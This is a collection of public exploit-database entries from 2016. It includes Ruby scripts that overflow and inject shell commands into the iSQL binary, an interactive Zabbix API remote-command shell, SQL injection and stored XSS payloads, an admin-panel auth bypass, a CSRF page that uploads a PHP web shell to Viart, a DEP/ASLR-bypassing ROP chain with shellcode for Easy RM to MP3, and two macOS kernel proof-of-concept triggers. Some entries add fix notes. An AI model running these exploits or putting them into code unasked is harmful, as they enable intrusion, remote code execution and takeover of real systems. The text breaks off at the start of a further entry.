# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/roselone/iSQL
# Software Link: https://github.com/roselone/iSQL/archive/master.zip
# Version: 1.0
# Tested on: Debian [wheezy]
# CVE : none
=begin
### Vulnerability Point
 :: [isql_main.c line 453] strcpy((char *)cmd+5,str); is vulnerable
 :: the size of str is not checked before it is copied into the 100-byte cmd buffer
446 char *get_MD5(char *str){
447         FILE *stream;
448         char *buf=malloc(sizeof(char)*33);
449         char cmd[100];
450         memset(buf,'\0',sizeof(buf));
451         memset(cmd,'\0',sizeof(cmd));
452         strcpy(cmd,"echo "); //5
453         strcpy((char *)cmd+5,str);

Edit makefile > CFLAGS = -fno-stack-protector
#> make

### gdb history
(gdb) r
Starting program: /home/noon/Noon/LAB/exploit/vuln_test/iSQL/isql

*************** welcome to ISQL ****************
* version 1.0                                  *
* Designed by RL                               *
* Copyright (c) 2011, RL. All rights reserved  *
************************************************

>username: hwul_test
>password: AAAAAAAAAAAAAAAAAAAAAAAAAA...  ("A" * 800)
Program received signal SIGSEGV, Segmentation fault.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0x000000000040644c in get_MD5 ()

(gdb) x/s $rax
0x4141414141414141:     <error: Cannot access memory at address 0x4141414141414141>

(gdb) x/s $rbp
0x4141414141414141:     <error: Cannot access memory at address 0x4141414141414141>

### Registers
(gdb) i r
rax            0x4141414141414141       4702111234474983745
rbx            0x0      0
rcx            0x7ffff7b06480   140737348920448
rdx            0x0      0
rsi            0x60b610 6338064
rdi            0x5      5
rbp            0x4141414141414141       0x4141414141414141
rsp            0x7fffffffe948   0x7fffffffe948
r8             0xffffffff       4294967295
r9             0x0    
=end
# Print the banner, then drive the local ./isql binary with a username followed
# by an oversized password. The overflow itself is on the C side: isql_main.c
# line 453 copies the password into the 100-byte cmd[] array with an unbounded
# strcpy. The fix belongs there too: bound the copy (snprintf, or strncpy with
# room for the terminator) or reject input longer than the buffer allows.
banner = ['iSQL 1.0 - Buffer Overflow', ' - by hahwul', ' - Run BUG..']
puts banner
buffer = 'A' * 800
system("(sleep 5; echo -en 'hwul\n';sleep 1;echo -en 'asdf;#{buffer};echo 1';sleep 10) | ./isql")
            
#!/bin/ruby
# Exploit Title: iSQL(RL) 1.0 - Shell Command Injection
# Date: 2016-06-13
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/roselone/iSQL
# Software Link: https://github.com/roselone/iSQL/archive/master.zip
# Version: 1.0
# Tested on: Debian [wheezy]
# CVE : none


=begin
### Vulnerability Point
 :: [isql_main.c line 455] popen(cmd,"r"); is vulnerable
 :: special characters in str are not filtered before the string is handed to the shell
446 char *get_MD5(char *str){
447         FILE *stream;
448         char *buf=malloc(sizeof(char)*33);
449         char cmd[100];
450         memset(buf,'\0',sizeof(buf));
451         memset(cmd,'\0',sizeof(cmd));
452         strcpy(cmd,"echo "); //5
453         strcpy((char *)cmd+5,str);
454         strcpy((char *)cmd+5+strlen(str)," | md5sum");
455         stream=popen(cmd,"r");
456         fread(buf,sizeof(char),32,stream);
457 //      printf("%s\n",buf);
458         return buf;
459 }

### Vulnerability Trigger
614          while (USER_NUM==-1){
615                 printf(">username:");
616                 scanf("%s",username);
617                 printf(">password:");
618                 scanf("%s",passwd);
619                 md5=get_MD5(passwd);

### Vulnerability Run
>username:asdf;   
>password:asdf;top;echo 1

 (~) #> ps -aux | grep top
root     13279  0.0  0.0   4472   860 pts/1    S+   13:33   0:00 sh -c echo asdf;top;echo | md5sum
root     13280  0.3  0.0  26304  3200 pts/1    S+   13:33   0:00 top

=end 

### Attack command
#> (sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;nc;echo 1';sleep 10) | ./isql

### Ruby Code
# Usage: ruby iSQL_command_injection.rb [COMMAND], with ./isql in the current
# directory. The single argument is passed through the password prompt of the
# local binary; isql_main.c line 455 builds a shell command from that value and
# runs it via popen(), so shell metacharacters in it are interpreted. The
# server-side fix is to stop shelling out (compute the MD5 in-process) or, at
# minimum, never place unescaped user input into a popen()/system() string.
puts "SQL 1.0 - Shell Command Injection"
puts "by hahwul"
unless ARGV.size == 1
  puts "Usage: ruby iSQL_command_injection.rb [COMMAND]"
  puts " need ./isql in same directory"
  exit()
end
command = ARGV[0]
puts "CMD :: #{command}"
puts "Run Injection.."
system("(sleep 5; echo -en 'aasdf\n';sleep 1;echo -en 'asdf;#{command};echo 1';sleep 10) | ./isql")

### Sample Output
=begin
#> ruby test.rb nc
# Exploit Title: iSQL 1.0 Shell Command Injection
by hahwul
CMD :: nc
Run Injection..

*************** welcome to ISQL ****************
* version 1.0                                  *
* Designed by RL                               *
* Copyright (c) 2011, RL. All rights reserved  *
************************************************

>username:>password:verify failure , try again !
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
usage: nc [-46bCDdhjklnrStUuvZz] [-I length] [-i interval] [-O length]
	  [-P proxy_username] [-p source_port] [-q seconds] [-s source]
	  [-T toskeyword] [-V rtable] [-w timeout] [-X proxy_protocol]
	  [-x proxy_address[:port]] [destination] [port]
>username:>password:verify failure , try again !
^Ctest.rb:10:in `system': Interrupt
	from test.rb:10:in `<main>'
=end
            
#!/usr/bin/env python
# -*- coding: utf-8 -*-

# Exploit Title: Zabbix RCE with API JSON-RPC
# Date: 06-06-2016
# Exploit Author: Alexander Gurin
# Vendor Homepage: http://www.zabbix.com
# Software Link: http://www.zabbix.com/download.php
# Version: 2.2 - 3.0.3
# Tested on: Linux (Debian, CentOS)
# CVE : N/A

import requests
import json
import readline

ZABIX_ROOT = 'http://192.168.66.2'      # Zabbix base URL (address as given in the listing)
url = ZABIX_ROOT + '/api_jsonrpc.php'   # JSON-RPC endpoint; do not edit

login = 'Admin'        # Zabbix API user
password = 'zabbix'    # Zabbix API password
hostid = '10084'       # id of the monitored host the script is executed against

headers = {
    'content-type': 'application/json',
}


def _rpc(method, params, token):
    """POST one JSON-RPC 2.0 request to the Zabbix API.

    method: API method name, e.g. "user.login".
    params: the request's "params" object.
    token:  session token for "auth" (None for the login call).

    Returns the raw requests.Response. Callers decode it with .json() only
    where the original script did, so a non-JSON reply fails at the same
    point as before.
    """
    body = {
        "jsonrpc": "2.0",
        "method": method,
        "params": params,
        "auth": token,
        "id": 0,
    }
    return requests.post(url, data=json.dumps(body), headers=headers)


# This is not an unauthenticated bug: every call below needs valid API
# credentials with the right to edit and run global scripts. Changing the
# default Admin/zabbix credentials and restricting script edit/execute
# permissions are the controls that matter on the defending side.
auth = _rpc("user.login", {'user': login, 'password': password}, None).json()

while True:
    cmd = raw_input('\033[41m[zabbix_cmd]>>: \033[0m ')
    if cmd == "":
        # An empty line deliberately falls through and re-runs the last
        # stored command, so its output is shown again.
        print("Result of last command:")
    if cmd == "quit":
        break

    token = auth['result']
    # Overwrite global script 1 with the typed command...
    _rpc("script.update", {"scriptid": "1", "command": cmd}, token)
    # ...then run it on the chosen host and print what came back.
    executed = _rpc("script.execute", {"scriptid": "1", "hostid": hostid}, token).json()
    print(executed["result"]["value"])
            
######################
# Exploit Title : Joomla com_payplans - SQL Injection
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://extensions.joomla.org/extension/payplans
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 3.3.6
# Date: 2016/06/08
######################
#
# PoC:

# group_id Parameter Vulnerable To SQL

# Demo :

# http://server/index.php?option=com_payplans&group_id=4%27

# Youtube : https://www.youtube.com/watch?v=Y5mpM0IBlUk

######################
# Discovered by : Mojtaba MobhaM 
# Greetz : Muhmmad Emad & T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : persian-team.ir
######################
            
<!--
# Exploit Title:  Grid Gallery 1.0 - Admin panel Authentication bypass
# Date: 13th June 2016
# Exploit Author: Ali BawazeEer
# Vendor Homepage: http://phpstaff.com.br/
# Version: 2.0

-->


=======================================================================================================

Grid Gallery 1.0 Admin panel Authentication bypass 

Description : Attackers are able to completely compromise a web application built upon
Grid Gallery, as they can gain access to the admin panel and
manage the website as an admin without prior authentication.


Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php
Step 2: Access http://example.com/path/admin/index.php


Risk : Unauthenticated attackers are able to gain full access to the administrator panel
and thus have total control over the web application, including changing content, adding admin users, etc.

=======================================================================================================
Potential fix:


<?php
// Server-side gate for admin pages: when the session carries no "auth" flag,
// send the browser to the login form AND stop executing. Terminating is the
// point of the fix: a Location header on its own is advisory, and a client that
// ignores it (the No-Redirect bypass described above) would otherwise still be
// served the full admin page.
// NOTE(review): the Location is relative ('admin/login.php'); if this snippet is
// included from admin/index.php the browser resolves it to admin/admin/login.php.
// Confirm the include location before deploying.
session_start();
$authenticated = isset($_SESSION["auth"]);
if (!$authenticated) {
    header('Location: admin/login.php');
    exit;
}
?>


[+] Exploit by: Ali BawazeEer
[+] Twitter:@AlibawazeEer
[+] Linkedin : https://www.linkedin.com/in/AliBawazeEer
            
<!--
# Exploit Title:  Dream Gallery 2.0 - Admin panel Authentication bypass
# Date: 13th June 2016
# Exploit Author: Ali BawazeEer
# Vendor Homepage: http://phpstaff.com.br/
# Version: 2.0

-->


=======================================================================================================

Dream Gallery 2.0 Admin panel Authentication bypass 

Description : Attackers are able to completely compromise a web application built upon
Dream Gallery, as they can gain access to the admin panel and
manage the website as an admin without prior authentication.


Step 1: Create a rule in No-Redirect Add-on: ^http://example.com/path/admin/login.php
Step 2: Access http://example.com/path/admin/index.php


Risk : Unauthenticated attackers are able to gain full access to the administrator panel
and thus have total control over the web application, including changing content, adding admin users, etc.

=======================================================================================================
Potential fix:


<?php
// Server-side gate for admin pages: when the session carries no "auth" flag,
// send the browser to the login form AND stop executing. Terminating is the
// point of the fix: a Location header on its own is advisory, and a client that
// ignores it (the No-Redirect bypass described above) would otherwise still be
// served the full admin page.
// NOTE(review): the Location is relative ('admin/login.php'); if this snippet is
// included from admin/index.php the browser resolves it to admin/admin/login.php.
// Confirm the include location before deploying.
session_start();
$authenticated = isset($_SESSION["auth"]);
if (!$authenticated) {
    header('Location: admin/login.php');
    exit;
}
?>


[+] Exploit by: Ali BawazeEer
[+] Twitter:@AlibawazeEer
[+] Linkedin : https://www.linkedin.com/in/AliBawazeEer
            
# Exploit Title: Easy RM to MP3 Converter 2.7.3.700 (.m3u) File BoF Exploit with Universal DEP+ASLR bypass
# Date: 2016-06-12
# Exploit Author: Csaba Fitzl
# Vendor Homepage: N/A
# Software Link: https://www.exploit-db.com/apps/707414955696c57b71c7f160c720bed5-EasyRMtoMP3Converter.exe
# Version: 2.7.3.700
# Tested on: Windows 7 x64
# CVE : CVE-2009-1330

import struct

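def create_rop_chain():
    """Build the VirtualAlloc() ROP chain and return it packed as bytes.

    All gadgets live in MSRMfilter03.dll (loaded at 0x10000000, no ASLR
    rebase), which is what gives the "universal" DEP+ASLR bypass.  The chain
    follows the usual mona.py PUSHAD layout: the registers are loaded so that
    the final PUSHAD lays out a VirtualAlloc(lpAddress=ESP, dwSize=EBX=1,
    flAllocationType=EDX=0x1000, flProtect=ECX=0x40) call whose return lands
    in the now-executable stack, i.e. on the shellcode that follows the chain.

    Returns:
        A little-endian packed byte string (140 DWORDs, 560 bytes).  ``b''``
        is used for the join so the result is a byte string on both
        Python 2 and Python 3 (the original ``''.join`` breaks on 3).
    """
    FILLER = 0x41414141          # padding consumed by POP instructions

    rop_gadgets = [
        # --- EDX = 0x1000 (flAllocationType, MEM_COMMIT) ------------------
        FILLER, FILLER, FILLER,   # compensate for the ADD ESP,8 pivot / first pops
        0x10025a1c,               # XOR EDX,EDX # RETN
        0x1002bc3d,               # MOV EAX,411 # RETN
    ]
    # EAX: 0x411 + 11*0x100 + 0x80 + 0x40 + 11*4 + 3 == 0x1000
    rop_gadgets += [0x1002dc4c, FILLER] * 11   # ADD EAX,100 # POP EBP # RETN
    rop_gadgets += [0x1002dc24, FILLER]        # ADD EAX,80 # POP EBP # RETN
    rop_gadgets += [0x1002dc41, FILLER]        # ADD EAX,40 # POP EBP # RETN
    rop_gadgets += [0x1001d2ac] * 11           # ADD EAX,4 # RETN
    rop_gadgets += [0x10023327] * 3            # INC EAX # RETN  -> EAX = 0x1000
    rop_gadgets += [
        0x1001a788,               # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN
        FILLER, FILLER, FILLER,
        0x1001bf0d,               # ADC EDX,ESI  (EDX was 0, so EDX = 0x1000)
        FILLER,

        # --- ESI = VirtualAlloc ------------------------------------------
        0x10026d56,               # POP EAX # RETN
        0x10032078,               # ptr to &VirtualAlloc() [IAT MSRMfilter03.dll]
        0x1002e0c8,               # MOV EAX,DWORD PTR DS:[EAX] # RETN
        0x1001a788,               # PUSH EAX # POP ESI # POP EBP # MOV EAX,1 # POP EBX # POP ECX # RETN
        FILLER, FILLER, FILLER,

        # --- EBP = "push esp # ret" (return into the allocated stack) ----
        0x10027c5a,               # POP EBP # RETN
        0x1001b058,               # & push esp # ret

        # --- EBX = 1 (dwSize) via delta so no NULL bytes are needed ------
        0x1002b93e,               # POP EAX # RETN
        0xfffffffb,               # put delta into eax (-> put 0x00000001 into ebx)
        0x1001d2ac,               # ADD EAX,4 # RETN
        0x10023327,               # INC EAX # RETN
        0x10023327,               # INC EAX # RETN
        0x1001bdee,               # PUSH EAX # MOV EAX,1 # POP EBX # ADD ESP,8 # RETN
        FILLER, FILLER,

        # --- ECX = 0x40 (flProtect, PAGE_EXECUTE_READWRITE) --------------
        0x10029f74,               # POP ECX # RETN
        0xffffffff,
    ]
    # 0xffffffff + 65 wraps to 0x40.  The AND EAX,8 side effect is harmless here.
    rop_gadgets += [0x1002dd3e] * 65           # INC ECX # AND EAX,8 # RETN
    rop_gadgets += [
        0x1002bc6a,               # POP EDI # RETN
        0x1001c121,               # RETN (ROP NOP)  -> EDI
        0x10026f2b,               # POP EAX # RETN
        0x10024004,               # writeable address in the DLL's data section; survives the XOR/ADD below
        0x1002bc07,               # PUSHAD # XOR EAX,11005 # ADD BYTE PTR DS:[EAX],AL
    ]

    return b''.join(struct.pack('<I', gadget) for gadget in rop_gadgets)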

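buffersize = 26090      # bytes of padding before the saved return address

# Everything below is assembled from byte literals so the script behaves the
# same on Python 2 and Python 3 and no text-mode newline translation can
# touch the payload.
junk = b"A" * buffersize

eip = b'\x85\x22\x01\x10'  # 0x10012285 {pivot 8 / 0x08} :  # ADD ESP,8 # RETN

rop = create_rop_chain()

# Position-independent shellcode: pushes "calc", walks the PEB / kernel32
# export table for the export starting with "WinE" (WinExec) and calls it.
calc = (
    b"\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64"
    b"\x8B\x72\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B"
    b"\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20"
    b"\x01\xFE\x8B\x4C\x1F\x24\x01\xF9\x42\xAD\x81\x3C\x07"
    b"\x57\x69\x6E\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
    b"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7")

shell = b"\x90" * 0x10 + calc   # short NOP sled in front of the shellcode

# ROP chain and shellcode share a fixed 1000-byte window after EIP; the rest
# is filled with 'C'.  (rop is 560 bytes and shell 90 here, so it fits; the
# max() only makes the "window exceeded" case explicit rather than silent.)
tail_len = max(0, 1000 - len(rop) - len(shell))
exploit = junk + eip + rop + shell + b'C' * tail_len

filename = "list.m3u"
# Binary mode: on Windows, text mode would rewrite any 0x0a byte in the payload.
with open(filename, 'wb') as textfile:
    textfile.write(exploit)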
            
# Exploit Title: FRticket - Ticket System - Stored XSS
# Google Dork: [if applicable]
# Date: 11.06.2016
# Exploit Author: Hamit ABİŞ
# Vendor Homepage: http://codecanyon.net/item/frticket-ticket-system/16539836
# Version: v1

#########################################################################################################

About


Get the world’s most popular customer support ticket system. FRticket is basically a management of enquiries between customers , agents and admins


Features:


- Admin Panel Dashboard

- Email Templates

- Agent Assignment

- Status Management

- Priority Management

- Categories Management

- And More Coming Soon…


#########################################################################################################


##########################################################################################################
Proof of Concept - Stored XSS via the ticket title (`subject` parameter)

The value submitted as `subject` is stored with the ticket and later rendered back without output encoding, so the `<svg onload=...>` payload below fires for whoever opens the ticket (presumably agents and admins as well as the submitter). `_token` is the session's CSRF token; the payload is shown unencoded for readability, a real request body would percent-encode it.

POST /ticket/public/ticket HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
Connection: keep-alive
_token=3XSACg1vDJQgzFCkVGk7nqE0HMOPlsuo7sbj5Z2y&subject=<svg onload=prompt(1)>&priority=2&category=2&description=somecomments

##########################################################################################################


Twitter: https://twitter.com/sar1nz
            
<!--
# Exploit Title : Viart Shopping Cart 5.0 CSRF Shell Upload Vulnerability
# Date : 2016/06/12
# Google Dork : Script-Kiddie ;)
# Exploit Author : Ali Ghanbari
# Vendor Homepage : http://www.viart.com/
# Software Link  : http://www.viart.com/php_shopping_cart_free_evaluation_download.html
# Version : 5.0


#POC
-->

<html>
  <body onload="submitRequest();">
    <script>
      // Forged multipart upload to the Viart admin file manager.  The
      // browser attaches the victim's session cookie (withCredentials), so
      // the server treats the request as an upload made by the admin.
      // [shell.php] and the empty file body are placeholders.
      var BOUNDARY_LINE = "-----------------------------256672629917035";

      function submitRequest()
      {
        var req = new XMLHttpRequest();
        req.open("POST", "http://localhost/admin/admin_fm_upload_files.php", true);
        req.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
        req.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        req.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------256672629917035");
        req.withCredentials = "true";

        // dir_root steers the upload out of the file-manager root into the
        // web-reachable images directory; newfile_0 carries the PHP file.
        var parts = [
          BOUNDARY_LINE,
          "Content-Disposition: form-data; name=\"dir_root\"",
          "",
          "../images",
          BOUNDARY_LINE,
          "Content-Disposition: form-data; name=\"newfile_0\"; filename=\"[shell.php]\"",
          "Content-Type: application/x-php",
          "",
          "",
          BOUNDARY_LINE + "--",
          ""
        ];
        var body = parts.join("\r\n");

        // Send the body as raw bytes so the browser does not re-encode it.
        var raw = new Uint8Array(body.length);
        for (var i = 0; i < raw.length; i++) {
          raw[i] = body.charCodeAt(i);
        }
        req.send(new Blob([raw]));
      }
    </script>
  </body>
</html>

<!--
#Desc:

Host the page above on a server you control and get a logged-in Viart administrator to open it.
The browser then sends the forged multipart request with the admin's session cookie, the file
manager writes the uploaded file under ../images, and the shell is reachable at:

http://localhost/images/[your shell]

Replace [shell.php] and the empty file body in the PoC with the real file first. The request only
works while the admin's session is valid and, as the advisory implies, because the upload endpoint
does not require a CSRF token.

####################################
 
[+]Exploit by: Ali Ghanbari

[+]My Telegram :@Exploiter007  
-->
            
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=724

nvAPIClient::Escape is the sole external method of the nvAccelerator user client of type 0x2a0.
It implements its own method and parameter demuxing using the struct-in struct-out
buffers.

The second dword in the struct in buffer is another method identifier used in a switch
statement in ::Escape to choose the method to call. Method 24 is ::SetClocksShmoo.

On entry to this method rsi points to a buffer in kernel space with completely
user-controlled contents.

The uint16_t field at +0xc is used as the loop count for the memory copying loop at
+0xff3e with insufficient bounds checking. The destination stack buffer is 0x520 bytes below the saved
frame pointer but the code only checks whether the value we provide (after bit shifting)
is greater than 0xff. Since each iteration of the loop writes 0x14 bytes we can actually
write up to 0x13ec bytes which is well over the size of the stack buffer which is being copied
into.

This bug is reachable from the Safari renderer sandbox and the Chrome GPU process sandbox
on devices with the appropriate hardware (e.g. a MacBook Pro with an NVIDIA GPU).
*/

// ianbeer

// build: clang -o nv_shmoo nv_shmoo.c -framework IOKit
// tested on MacBookPro 10,1  w/10.11.3 (15D21)

/*
OS X kernel stack buffer overflow in GeForce gpu driver

nvAPIClient::Escape is the sole external method of the nvAccelerator user client of type 0x2a0.
It implements its own method and parameter demuxing using the struct-in struct-out
buffers.

The second dword in the struct-in buffer is another method identifier used in a switch
statement in ::Escape to choose the method to call. Method 24 is ::SetClocksShmoo.

On entry to this method rsi points to a buffer in kernel space with completely
user-controlled contents.

The uint16_t field at +0xc is used as the loop count for the memory copying loop at
+0xff3e with insufficient bounds checking. The destination stack buffer is 0x520 bytes below the saved
frame pointer but the code only checks whether the value we provide (after bit shifting)
is greater than 0xff. Since each iteration of the loop writes 0x14 bytes we can actually
write up to 0x13ec bytes which is well over the size of the stack buffer which is being copied
into.

This bug is reachable from the Safari renderer sandbox and the Chrome GPU process sandbox
on devices with the appropriate hardware (e.g. a MacBook Pro with an NVIDIA GPU).
*/

#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/mman.h>

#include <mach/mach.h>
#include <mach/vm_map.h>

#include <IOKit/IOKitLib.h>

uint64_t release_device_texture(mach_port_t conn) {
  /*
   * Trigger for the SetClocksShmoo stack overflow.  (The name is historical;
   * nothing here releases a texture.)  Builds an Escape request whose 16-bit
   * count at +0xc is 0x1fe -- small enough to pass the driver's shifted
   * "> 0xff" check described in the header comment, yet enough iterations
   * of 0x14 bytes to run far past the 0x520-byte stack buffer -- and hands
   * it to external method 0 of the type-0x2a0 user client.
   *
   * conn: an open user client connection of type 0x2a0.
   * Returns 0 regardless of the outcome; the kern_return_t is only printed.
   */
  enum { kBufSize = 4096 };

  uint64_t scalars_in[16];
  uint64_t scalars_out[16];
  char     struct_in[kBufSize];
  char     struct_out[kBufSize];
  uint32_t scalars_out_cnt = 0;
  size_t   struct_in_cnt   = kBufSize;
  size_t   struct_out_cnt  = kBufSize;

  /* Everything the driver reads beyond the three fields below is 'A'. */
  memset(struct_in, 'A', struct_in_cnt);

  const uint32_t escape_hdr = 1;
  const uint32_t method_id  = 24;     /* ::SetClocksShmoo (see header comment) */
  const uint16_t loop_count = 0x1fe;  /* overflows the destination stack buffer */
  memcpy(struct_in + 0x0, &escape_hdr, sizeof escape_hdr);
  memcpy(struct_in + 0x4, &method_id,  sizeof method_id);
  memcpy(struct_in + 0xc, &loop_count, sizeof loop_count);

  kern_return_t kr = IOConnectCallMethod(conn,
                                         0x0,
                                         scalars_in, 0,
                                         struct_in, struct_in_cnt,
                                         scalars_out, &scalars_out_cnt,
                                         struct_out, &struct_out_cnt);

  if (kr == KERN_SUCCESS) {
    printf("worked?\n");
  } else {
    printf("IOConnectCall error: %x\n", kr);
  }

  return 0;
}

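mach_port_t get_user_client(char* name, int type) {
  /*
   * Open a user client of the given type on the first IOService whose class
   * matches `name`.
   *
   * name: IOKit class name handed to IOServiceMatching().
   * type: user-client type handed to IOServiceOpen().
   * Returns the connection port, or 0 (MACH_PORT_NULL) on any failure.
   *
   * Fix: the iterator and service objects are now released once they are no
   * longer needed (the original leaked both); the connection port is the only
   * reference handed back to the caller.
   */
  kern_return_t err;

  CFMutableDictionaryRef matching = IOServiceMatching(name);
  if (!matching) {
    printf("unable to create service matching dictionary\n");
    return 0;
  }

  /* IOServiceGetMatchingServices consumes the matching dictionary reference. */
  io_iterator_t iterator = IO_OBJECT_NULL;
  err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
  if (err != KERN_SUCCESS) {
    printf("no matches\n");
    return 0;
  }

  /* Only the first match is used, so the iterator can go right away. */
  io_service_t service = IOIteratorNext(iterator);
  IOObjectRelease(iterator);

  if (service == IO_OBJECT_NULL) {
    printf("unable to find service\n");
    return 0;
  }
  printf("got service: %x\n", service);

  io_connect_t conn = MACH_PORT_NULL;
  err = IOServiceOpen(service, mach_task_self(), type, &conn);
  IOObjectRelease(service);   /* the connection keeps its own reference */
  if (err != KERN_SUCCESS) {
    printf("unable to get user client connection\n");
    return 0;
  }

  printf("got userclient connection: %x\n", conn);
  return conn;
}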



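int main(int argc, char** argv){
  (void)argc;
  (void)argv;

  /* Type 0x2a0 selects the nvAPIClient-style user client (see header comment). */
  mach_port_t gl_context = get_user_client("IOAccelerator", 0x2a0);
  if (gl_context == MACH_PORT_NULL) {
    /* Without a connection the trigger would just call the kernel with a
     * null port; bail out instead of reporting a misleading error. */
    printf("could not open an IOAccelerator user client of type 0x2a0\n");
    return 1;
  }

  release_device_texture(gl_context);
  return 0;
}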
            
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=772

In IOAccelContext2::clientMemoryForType the lock_busy/unlock_busy should be extended to cover all the code
setting up shared memory type 2.

At the moment the lock doesn't protect two threads racing where one reaches
the release at +0x56AD (outside the lock) while the other is still using those raw pages via the raw pointer at
IOAccelContext+0x610 inside the locked region.

Tested on OS X 10.11.4 (15E65) on MacBookAir 5,2
*/

// ianbeer

// clang -o ioaccel_mem_uaf ioaccel_mem_uaf.c -framework IOKit -framework CoreFoundation -lpthread


/*
OS X kernel use-after-free due to bad locking in IOAcceleratorFamily2

In IOAccelContext2::clientMemoryForType the lock_busy/unlock_busy should be extended to cover all the code
setting up shared memory type 2.

At the moment the lock doesn't protect two threads racing where one reaches
the release at +0x56AD (outside the lock) while the other is still using those raw pages via the raw pointer at
IOAccelContext+0x610 inside the locked region.

Tested on OS X 10.11.4 (15E65) on MacBookAir 5,2
*/

#include <fcntl.h>
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/time.h>
#include <unistd.h>

#include <libkern/OSAtomic.h>
#include <mach/mach_error.h>

#include <IOKit/IOKitLib.h>
#include <CoreFoundation/CoreFoundation.h>

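io_connect_t get_user_client(const char* name, int type) {
  /*
   * Find an IOService called `name` and open a user client of `type` on it.
   *
   * Three lookups are tried in turn: an exact class match, an exact
   * registry-name match, and finally a scan of every IOService for a class
   * name that merely contains `name`.
   *
   * Returns the connection, or MACH_PORT_NULL if nothing matched or
   * IOServiceOpen failed.  Intermediate registry objects are released.
   *
   * Fix: the iterator is initialised and the return value of
   * IOServiceGetMatchingServices is checked; the original walked an
   * uninitialised iterator if that call failed.
   */
  kern_return_t err;
  CFDictionaryRef matching;
  io_service_t service;

  // try IOServiceMatching
  matching = IOServiceMatching(name);
  service = IOServiceGetMatchingService(kIOMasterPortDefault, matching); // consumes a ref on matching

  if (service == MACH_PORT_NULL) {
    // try IOServiceNameMatching
    matching = IOServiceNameMatching(name);
    service = IOServiceGetMatchingService(kIOMasterPortDefault, matching);
  }

  if (service == MACH_PORT_NULL) {
    // try everything and look for a partial name match
    matching = IOServiceMatching("IOService");
    io_iterator_t iterator = IO_OBJECT_NULL;
    err = IOServiceGetMatchingServices(kIOMasterPortDefault, matching, &iterator);
    if (err != KERN_SUCCESS) {
      printf("IOServiceGetMatchingServices failed: %s\n", mach_error_string(err));
      return MACH_PORT_NULL;
    }

    int found_it = 0;
    while ((service = IOIteratorNext(iterator)) != IO_OBJECT_NULL) {
      io_name_t object_name;
      IOObjectGetClass(service, object_name);
      if (strstr(object_name, name)) {
        found_it = 1;   // keep this service's reference; released after IOServiceOpen
        break;
      }
      IOObjectRelease(service);
    }
    IOObjectRelease(iterator);

    if (!found_it) {
      // couldn't find any matches for the name anywhere
      return MACH_PORT_NULL;
    }
  }

  io_connect_t conn = MACH_PORT_NULL;

  err = IOServiceOpen(service, mach_task_self(), type, &conn);
  if (err != KERN_SUCCESS){
    printf("IOServiceOpen failed: %s\n", mach_error_string(err));
    IOObjectRelease(service);
    return MACH_PORT_NULL;
  }
  IOObjectRelease(service);   // the connection holds its own reference

  return conn;
}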


kern_return_t ioconnect_map(io_connect_t conn, int type) {
  /*
   * Map one page of the user client's shared memory of the given `type`
   * into this task and return the IOKit status.  The mapped address is
   * discarded on purpose: what the PoC needs is the kernel-side set-up in
   * clientMemoryForType (see header comment), not the mapping itself.
   */
  mach_vm_address_t mapped_at = 0;
  mach_vm_size_t    length    = 0x1000;

  kern_return_t kr = IOConnectMapMemory64(conn, type, mach_task_self(),
                                          &mapped_at, &length, kIOMapAnywhere);
  return kr;
}

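kern_return_t ioconnect_unmap(io_connect_t conn, int type) {
  /*
   * Unmap shared memory of `type` from this task.
   *
   * NOTE(review): the address passed is always 0, never the address that
   * ioconnect_map() obtained, and nothing in this PoC calls the helper; it
   * is kept for symmetry only.  The unused `size` local was removed.
   */
  mach_vm_address_t addr = 0;
  return IOConnectUnmapMemory64(conn, type, mach_task_self(), addr);
}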

/* Connection shared by main() and the worker thread; main() reopens it on
 * every outer iteration. */
io_connect_t client = MACH_PORT_NULL;

/* Thread body: hammer the type-2 shared-memory mapping 1000 times.  Two
 * threads running this concurrently is what races the unlocked release
 * against the locked use described in the header comment. */
void* poc(void* arg) {
  (void)arg;
  int remaining = 1000;
  while (remaining-- > 0) {
    ioconnect_map(client, 2);
  }
  return NULL;
}

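int main(int argc, char** argv){
  (void)argc;
  (void)argv;

  /* Reopen the user client each round so the shared memory is set up from
   * scratch, then race two threads over the type-2 mapping. */
  for(;;){
    client = get_user_client("IntelAccelerator", 2);
    if (client == MACH_PORT_NULL) {
      /* Otherwise both threads would just spin calling the kernel with a
       * null port and IOServiceClose would be handed the same null port. */
      printf("could not open IntelAccelerator user client type 2\n");
      return 1;
    }

    pthread_t t;
    int spawned = (pthread_create(&t, NULL, poc, NULL) == 0);
    poc(NULL);
    if (spawned) {
      pthread_join(t, NULL);
    }
    IOServiceClose(client);
  }
  return 0;
}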
            
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=732

